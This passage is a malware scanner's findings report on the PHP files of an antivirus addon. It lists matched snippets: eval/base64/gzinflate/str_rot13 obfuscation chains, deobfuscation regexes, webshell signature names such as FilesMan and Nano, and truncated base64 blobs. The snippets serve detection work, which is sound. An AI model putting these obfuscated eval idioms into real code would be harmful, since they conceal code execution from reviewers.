-u, --username=<username> Run scanner with specific user id and group id, e.g. --username=www-data.
-q, --quite Do not output information about the current scan job to a console.
Scan options:
-y, --deobfuscate Try to deobfuscate files when scanning.
--with-suspicious Detect suspicious files. Disabled by default.
--scan-archive Scan zip files (Works wit...
| Sign 11413268 Line: 16766 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 11413268 Line: 22037 Dangerous Malware Signature (hash: 11413268) |
eval(gzinflate(str_rot13
| Sign 11413268 Line: 22487 Dangerous Malware Signature (hash: 11413268) |
eval(str_rot13
| Sign 11413268 Line: 7125 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 301ca578 Line: 16249 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 16789 Dangerous Malware Signature (hash: 34b7e999) |
default_action="FilesMan
| Sign 34b7e999 Line: 2092 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 43b0d90f Line: 15587 Dangerous Malware Signature (hash: 43b0d90f) |
edoced_46esab
| Sign 43b0d90f Line: 15592 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 43b0d90f Line: 18156 Dangerous Malware Signature (hash: 43b0d90f) |
Edoced_46esab
| Sign 4a069524 Line: 2092 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 5c38b15f Line: 7232 Dangerous Malware Signature (hash: 5c38b15f) |
1337day.com
| Sign 7186bb8d Line: 8668 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 7830f7a6 Line: 2081 Dangerous Malware Signature (hash: 7830f7a6) |
nVch
| Sign 963e968a Line: 13939 Dangerous Malware Signature (hash: 963e968a) |
PHPJiaMi
| Sign d97f004d Line: 2092 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign ee1cb326 Line: 2081 Dangerous Malware Signature (hash: ee1cb326) |
9wZw
| Sign f9dc0a55 Line: 12638 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
| Sign f9dc0a55 Line: 15707 Dangerous Malware Signature (hash: f9dc0a55) |
"base64_decode"
| Sign f9dc0a55 Line: 16983 Dangerous Malware Signature (hash: f9dc0a55) |
'" . base64_decode
| Sign f9dc0a55 Line: 18917 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/tools/ai-bolit-hoster.php Size: 1.76 MB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Warns: 14 Dangers: 81
| Description | Match |
|---|
Exploit base64_long Line: 2087 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"5X2JdttGtuCvxHJkEQJFEuAuiqIdx306fdKdfrbTPe+xZDVIQiJtimAT1BaB/z53qwUg5Dhv5rwz50y6TWEp1Hrr7vdWdBo2OqdPi9PGID0NgubpwVmk5v58E1+p+fEQ/ik1Gh8dXMy323U6Oq3Xx5/qcPvUqPb7O3X/Od6k8WM6/oTPgmqrsZPy8OX5WN2ruX48kaIjedqoBu3dWT06PxgsTgNoPeyF0HplcbWJbmIPOlEZnap7+Bra4a5Qvfdcn7ThjdLN1HmN3TyFa+zn0UF9oEbYPnS1rj9UNah3PV9n0+uFB32FYlzIVvptDWMpKptuH5dxdr+YbefZPF5cz7ee+x2VmS3S9TJ6hBv8aJWsYv584I2kXDZuBOGF3HgeNNbE5s/h31ldBTRNIS5SqwXTlE43i/VWpf72cR2rFFpL6cNt/LCtf47uIi5AHUiPcY6kzMHRBbQsq+mN6vXJYqtqy8f6WM2ik98unlrVINzJd+fw76z...
| Exploit base64_long Line: 2092 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YTo1OntzOjEwOiJ3aXphcmQucGhwIjtzOjM3OiJjbGFzcyBXZWxjb21lU3RlcCBleHRlbmRzIENXaXphcmRTdGVwIjtzOjE3OiJ1cGRhdGVfY2xpZW50LnBocCI7czozNzoieyBDVXBkYXRlQ2xpZW50OjpBZGRNZXNzYWdlMkxvZygiZXhlYyI7czoxMToiaW5jbHVkZS5waHAiO3M6NDg6IkdMT0JBTFNbIlVTRVIiXS0+SXNBdXRob3JpemVkKCkgJiYgJGFyQXV0aFJlc3VsdCI7czo5OiJzdGFydC5waHAiO3M6NjA6IkJYX1JPT1QuJy9tb2R1bGVzL21haW4vY2xhc3Nlcy9nZW5lcmFsL3VwZGF0ZV9kYl91cGRhdGVyLnBocCI7czoxMDoiaGVscGVyLnBocCI7czo1ODoiSlBsdWdpbkhlbHBlcjo6Z2V0UGx1Z2luKCJzeXN0ZW0iLCJvbmVjbGlja2NoZWNrb3V0X3Z...
| Exploit base64_long Line: 8766 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7Z0JYBTV/cfn2myWJLvJZsMVxCCgeADe9UAlhABRSEII3gq21Wq1ak+tokFttbRUQfBWRFvrXa21VWsLWK1HT3vaVlvofQtFFAST/N+bmd1989mZ2RxLwr/s4Pr2s9957/femzdv3kx2f7/XX3/9dU2zIq0TDE1bbGpyq4z/+h4ts+m6eDnvxKtOS1PultYfaXW4Dpp8/UTCO5o2da7z+eLTvWVY4iVr0a1si0TVxH/alGlCn+q8l/tEYEO+f7zV0biZSrlD3M/k+3Q+qdW9nW1bOpX9Yqn7uPnKXPvj3X33dvffW8kvX4abpu1bCvttMv9kfDZfvKaWecuUdZBlVM4NKMhnk/nWvd3z/eVW46b7uOmBbjpK2adOvPbqY37ZDjV/+pikKzzV6F19/bbZoowhCss+fE5zjl+agzZLeV0sXuvE63F8Hra1uuU/4hrJNMd9E02kt3ip2Mrl7qVWaWa3k938LwTkj0SdLVIit2hUtwxL3Ra...
| Exploit base64_long Line: 8768 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZrLUhpBFIZ7huEyiiJe8IIoKt7wMm1VllYFNqkskpSLPIDvkY3LLF1mmefIiqos8hAs8hDZYMlAuofu6e4fUQgaielf29Nfn+5zpmemAM/QbDabhHjJixNCyFWCcN3++PyNKDnRL5F/lUXx8TJr2cUelwfMIbuKa4umv8vkCiv5lWvm1I9Dz3FXPilXNBmXaP2y8H2p9O8xOi9abD1HQjQ+1xNj0jqiuZDfhXEUX5+EsYTWl3H1fQwrvq5RGW3NvrBU2HXNV2Zt+65FsLmrPCF57QpmidrHlGiDVK7HKk8EuwkvmUpn/Kni3Tzq+ufez6TzQ+fbsmXLli2/DH7u9xvLli1btmzZ8rNzLU/I5RwbZ5aylq3X04OKJ3Wtz+fWwY/LEsAeMNZhUsBp4AywD8zrHHwfUkXWHDiwGcwplU6zlvIc4nENKh/1SZbXRq3jHAnb6fY0bD5UVlhZ/cH9aS5xGpyh9/YU8VA51q5zvXshul/YRW3...
| Exploit base64_long Line: 8770 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'7ZtNk9REGMefZF72jd0MD6ALC7sDgryIAr6iogwKCIgUBw8cPGCVJ7+CB+cjcPDgkYMHLlbxDdwqrdKjR6v24FegysuyLDumJ88/yfN0ZmZnRmpgzW+rt///7qQ76STdPZ2ZtbW1NaJqjS4RUbtCjjs3l5kUQfp/X+qKaRodmO2PumrOZr69ovfvxNQlhj8a6jKcjpOoInWsL2f1Ta8keZa6BJRLOd2U8v46k+27gI0u6fPKn18tDgfkeJYkDXEo6RWJq7kAX8SSqYOkjDyBHLuLr5n264crp3V2+9s7jkuMYzpStFFRg+do1bSfj8MiZefV734KwJQj8JgKqkG8UbVST3wtJZhONwr1PsYOzp8gM9K8D8IkfijPwm1pvK8qyX29WknSW9XkMcZz91NYcHkacl3i0I6BdvfUz3Heqmx2Y47o+4jomLl+oHsIwYCLvwO4G4ev4/BNHO45Hzfs3bidv52N44bcv/1u4jGY91ICV1WQ98P...
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
"YToxNTY1OntzOjM6IuKAqCI7czoxOiIgIjtzOjM6IuKAqSI7czoxOiIgIjtzOjM6IuGagCI7czoxOiIgIjtzOjM6IuKAgCI7czoxOiIgIjtzOjM6IuKAgSI7czoxOiIgIjtzOjM6IuKAgiI7czoxOiIgIjtzOjM6IuKAgyI7czoxOiIgIjtzOjM6IuKAhCI7czoxOiIgIjtzOjM6IuKAhSI7czoxOiIgIjtzOjM6IuKAhiI7czoxOiIgIjtzOjM6IuKAiCI7czoxOiIgIjtzOjM6IuKAiSI7czoxOiIgIjtzOjM6IuKAiiI7czoxOiIgIjtzOjM6IuKBnyI7czoxOiIgIjtzOjI6IsKgIjtzOjE6IiAiO3M6Mzoi4oCHIjtzOjE6IiAiO3M6Mzoi4oCvIjtzOjE6IiAiO3M6Mjoiw4IiO3M6MToiICI7czoyOiLfuiI7czoxOiJfIjtzOjM6Iu+5jSI7czoxOiJfIjtzOjM6Iu+5jiI...
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code |
$JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[13] . $JYekrRTYM[21] . $JYekrRTYM[4] . $JYekrRTYM[17] . $JYekrRTYM[19] . $JYekrRTYM[26] . $JYekrRTYM[20] . $JYekrRTYM[20] . $JYekrRTYM[3] . $JYekrRTYM[4] . $JYekrRTYM[2] . $JYekrRTYM[14] . $JYekrRTYM[3] . $JYekrRTYM[4]; return Helpers::convertToSafeFunc($jPnPLPZcMHgH) ? $jPnPLPZcMHgH($sBtUiFZaz) : ''; }
| Exploit download_remote_code2 Line: 16282 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwriteB64DecodedStr',
],
[
'full' => '~file_put_contents\(\$_SERVER\[\'[^\']+\'\]\.\'[^\']+\',base64_decode\(\'[^\']+\'\)
| Exploit eval_base64 Line: 16766 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(')
| Exploit eval_base64 Line: 16808 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(\')
| Exploit eval_base64 Line: 17160 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(' . $matches[3] . ')
| Exploit eval_base64 Line: 22248 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit eval_base64 Line: 22604 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit eval_preg Line: 22504 Dangerous RCE (Remote Code Execution), through PCRE (Perl compatible Regular Expression), allow remote attackers to execute arbitrary commands or code on the target machine |
preg_replace("/' . $matches[2] . '/e",\'\'', '\'\',"' . $matches[2] . '")
| Exploit execution Line: 1665 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(strrev(trim(file_get_contents($avdb_file)
| Exploit execution Line: 16766 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(')
| Exploit execution Line: 16808 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(\')
| Exploit execution Line: 17160 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(' . $matches[3] . ')
| Exploit execution Line: 17397 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($layer2)
| Exploit execution Line: 17506 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($match[2])
| Exploit execution Line: 17510 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[2])
| Exploit execution Line: 17575 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode(str_rot13($matches[3])
| Exploit execution Line: 18256 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(strrev($matches[12])
| Exploit execution Line: 18691 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($matches[4])
| Exploit execution Line: 18758 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($matches[4])
| Exploit execution Line: 19362 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(end($array)
| Exploit execution Line: 19370 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(Helpers::getTextInsideQuotes(Helpers::getEvalCode($phpcode)
| Exploit execution Line: 19484 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode(str_rot13($str_to_concat)
| Exploit execution Line: 20037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(base64_decode($result)
| Exploit execution Line: 20660 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($m[1])
| Exploit execution Line: 20757 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($encodedStr)
| Exploit execution Line: 21953 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode')
| Exploit execution Line: 21957 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(base64_decode')
| Exploit execution Line: 22037 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(gzinflate(str_rot13(base64_decode(' . $matches[2] . ')
| Exploit execution Line: 22092 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($matches[1])
| Exploit execution Line: 22154 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[2])
| Exploit execution Line: 22155 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($openssl_data[4])
| Exploit execution Line: 22158 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13($decoded)
| Exploit execution Line: 22248 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(')
| Exploit execution Line: 22249 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[11])
| Exploit execution Line: 22261 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[4])
| Exploit execution Line: 22323 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(gzinflate(base64_decode($matches[2])
| Exploit execution Line: 22377 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode(str_rot13(implode('', $array)
| Exploit execution Line: 22487 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(str_rot13(gzinflate(str_rot13(gzinflate(base64_decode(')
| Exploit execution Line: 22604 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
eval(base64_decode(gzinflate(base64_decode(\'' . $matches[6] . '\')
| Exploit hex_char Line: 15511 Dangerous Hex char is usually used for the obfuscation of malicious code |
\x5f
| Exploit ioncube_loader Line: 15345 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
IonCube_loader
| Exploit md5_create_function Dangerous The `create_function` technique is usually used for the obfuscation of malicious code |
$md5 = md5($res); $res = base64_decode(str_replace($md5, '', strtr($matches[5], $matches[6], $matches[7]))); if (preg_match('~eval\((?:\$[^(]{0,50}\(){2}\$[^,]{0,50},\s{0,10}\'([^\']{1,500})\',\s{0,10}\'([^\']{1,500})\'\){3};~msi', $res, $match)) { $res = Helpers::replaceVarsFromArray($vars, $res); if (preg_match('~eval\(base64_decode\(strtr\(~msi', $res)) { $res = base64_decode(strtr($arr1, $match[1], $match[2])); } } } return $res; } private function deobfuscateEvalArrayVar($str, $matches) { $...
| Exploit nano Line: 12287 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1](explode(',', $expr_arr[2])
| Exploit nano Line: 12293 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]((int)
| Exploit nano Line: 12296 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$expr_arr[1]($expr_arr[2])
| Exploit nano Line: 14123 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[1](@$args[2]($args[3])
| Exploit nano Line: 14145 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$args[0](@$args[1]($args[2])
| Exploit nano Line: 14193 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$params[$i]($params[0])
| Exploit nano Line: 14876 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1)
| Exploit nano Line: 14894 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$func_params['func']($val1, $val2)
| Exploit nano Line: 15014 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$function_otions['func'](...$params_array)
| Exploit nano Line: 16794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$_[GPRC](?:OST|ET|EQUEST|OOKIE)
| Exploit nano Line: 19821 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$match[2]($str[$dictionaryName], $match[4])
| Exploit nano Line: 20382 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$matches[4]($matches[6])
| Exploit nano Line: 22583 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$m[1]($m[2])
| Exploit nano Line: 23614 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$config[$class](...$constructorArgs)
| Exploit reversed Line: 16033 Dangerous Reverse function technique is used for the obfuscation of dangerous PHP functions |
ecalper_rts
| Exploit silenced_eval Line: 17499 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval((?:\(\$[0O]+\[[\'"]\w+[\'"]\])
| Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] |
assert(', 'eval(', $string); $string = str_replace('@@slaquote@@', '\\\'', $string); $string = str_replace('@@sladquote@@', '\\"', $string); $string = str_replace("eval(''.", 'eval(', $string); $res = str_replace($find, $string, $str); if (strpos($string, 'gzinflate(\'') !== false) { $res = $this->deobfuscateEval(stripcslashes($res), []); } return $res; } private function deobfuscateEval($str, $matches) { if (preg_match('~\)+\..{0,30}base64_decode~msi', $str)) { $res = explode(').', $str); $res ...
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function(\'', $cr_func, 2)); $func = implode(') {', explode('\',\'', $func, 2)); $func = substr($func, 0, -2) . '}'; $str = str_replace($cr_func, $func, $str); } return $str; } public static function calc($expr) { if (is_array($expr)) { $expr = $expr[0]; } $expr = str_replace([' ', "\r", "\n", "\t"], '', $expr); preg_match('~(chr|min|max|round)?\(([^\)]+)\)~msi', $expr, $expr_arr); if (@$expr_arr[1] == 'min' || @$expr_arr[1] == 'max') { return $expr_arr[1](explode(',', $expr_arr[2])); } e...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(?&c)\()?(?&c)rawurldecode(?&c)\((?&c)\3(?&c)\)(?&c)\s*\^\s*substr(?&c)\((?&c)str_repeat(?&c)\((?&c)\2,\s*(?&c)\((?&c)strlen(?&c)\((?&c)\3(?&c)\)(?&c)/strlen(?&c)\((?&c)\2(?&c)\)(?&c)\)(?&c)\s*\+\s*1(?&c)\)(?&c),\s*0,(?&c)\s*strlen(?&c)\((?&c)\3(?&c)\)(?&c)\)(?&c)\)(?:(?&c)\s*\.\s*\'{\'(?&c)\))?(?&c);~msi', 'id' => 'xorFName', ], [ 'full' => '~(\$\w{1,40})=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'[^\']+\'\);(\$\w+)=base64_decode\(\'([^\']+)\'\);eval\(\1\(gzuncompress\(\2\(\3\)\)\...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid($owner_id); if (!isset($owner['name']) || $owner['name'] !== 'root') { return false; } } elseif ($owner_id != 0) { return false; } $perms = fileperms($folder); if (($perms & 0x0100) && ($perms & 0x0080) && ($perms & 0x0040) && !($perms & 0x0800) && !($perms & 0x0010) && !($perms & 0x0002) ) { return true; } return false; } protected function isWorldWriteable($folder) { if (!file_exists($folder) || !is_dir($folder)) { return false; } $perms = fileperms($folder); if (($perms & 0x000...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] |
posix_kill($pid, SIGUSR1); } else { $this->debugLog("Job {$file}: Sending SIGUSR2 to {$pid}"); posix_kill($pid, SIGUSR2); } } elseif ($type == 'notify' && $malware) { $filename = basename($file, '.notify_job'); $reports[JSONReport::class] = $this->resident_out_dir . '/' . $filename . '.report'; foreach($this->report->call($this, $reports) as $report) { $report->generateReport($vars, $scan_time); $this->debugLog("Job {$file}: Creating report for job in {$filename}.report"); $report->write(); } un...
| Function posix_setuid Warning Potentially dangerous function `posix_setuid` [https://www.php.net/posix_setuid] |
posix_setuid($info['uid']); $defaults['userid'] = $info['uid']; $defaults['groupid'] = $info['gid']; } else { echo ('Invalid username'); exit(-1); } } if (isset($options['no-users'])) { $vars->users = null; } $avdb = ''; if ((isset($options['avdb']) && !empty($options['avdb']) && ($avdb = $options['avdb'])) || (isset($options['c']) && !empty($options['c']) && ($avdb = $options['c']))) { if (file_exists($avdb)) { $defaults['avdb'] = $avdb; } } if ((isset($options['file']) && !empty($options['file...
| Function str_rot13 eval_str_rot13 Line: 15166 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
| Function strrev eval_strrev Line: 15174 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
lave
| Function strrev eval_strrev Line: 8770 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
LAvE
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (Default: 1).
-u, --username=<username> Run scanner with specific user id and group id, e.g. --username=www-data.
-q, --quite Do not output information about the current scan job to a console.
Scan options:
-y, --deobfuscate Try to deobfuscate files when scanning.
--with-suspicious Detect suspicious files. Disabled by default.
--scan-archive Scan zip files (Works wit...
| Sign 11413268 Line: 16766 Dangerous Malware Signature (hash: 11413268) |
eval(base64_decode(
| Sign 11413268 Line: 22037 Dangerous Malware Signature (hash: 11413268) |
eval(gzinflate(str_rot13
| Sign 11413268 Line: 22487 Dangerous Malware Signature (hash: 11413268) |
eval(str_rot13
| Sign 11413268 Line: 7125 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 301ca578 Line: 16249 Dangerous Malware Signature (hash: 301ca578) |
tmhapbzcerff
| Sign 34b7e999 Line: 16789 Dangerous Malware Signature (hash: 34b7e999) |
default_action="FilesMan
| Sign 34b7e999 Line: 2092 Dangerous Malware Signature (hash: 34b7e999) |
dMT0JBTF
| Sign 43b0d90f Line: 15587 Dangerous Malware Signature (hash: 43b0d90f) |
edoced_46esab
| Sign 43b0d90f Line: 15592 Dangerous Malware Signature (hash: 43b0d90f) |
etalfnizg
| Sign 43b0d90f Line: 18156 Dangerous Malware Signature (hash: 43b0d90f) |
Edoced_46esab
| Sign 4a069524 Line: 2092 Dangerous Malware Signature (hash: 4a069524) |
aW5jbHVkZ
| Sign 5c38b15f Line: 7232 Dangerous Malware Signature (hash: 5c38b15f) |
1337day.com
| Sign 7186bb8d Line: 8668 Dangerous Malware Signature (hash: 7186bb8d) |
rootkit
| Sign 7830f7a6 Line: 2081 Dangerous Malware Signature (hash: 7830f7a6) |
nVch
| Sign 963e968a Line: 13939 Dangerous Malware Signature (hash: 963e968a) |
PHPJiaMi
| Sign d97f004d Line: 2092 Dangerous Malware Signature (hash: d97f004d) |
zeXN0ZW
| Sign ee1cb326 Line: 2081 Dangerous Malware Signature (hash: ee1cb326) |
9wZw
| Sign f9dc0a55 Line: 12638 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
| Sign f9dc0a55 Line: 15707 Dangerous Malware Signature (hash: f9dc0a55) |
"base64_decode"
| Sign f9dc0a55 Line: 16983 Dangerous Malware Signature (hash: f9dc0a55) |
'" . base64_decode
| Sign f9dc0a55 Line: 18917 Dangerous Malware Signature (hash: f9dc0a55) |
'' . base64_decode
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FilesMetaInfo.php Size: 5.51 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/FolderInfoFile.php Size: 8.61 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
Exploit ioncube_loader Line: 2 Dangerous IonCube is a PHP encoder and hence a module/library for protected functions and often used for the obfuscation of malicious code [https://www.ioncube.com] |
ioncube_loader
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//usr/local/mgr5/addon/revisium_antivirus/vendor/scaforeSDK/lib/Version.php Size: 1.86 kB Created: 2022-01-05 00:10:29 Modified: 2022-01-05 00:10:29 Dangers: 2
| Description | Match |
|---|
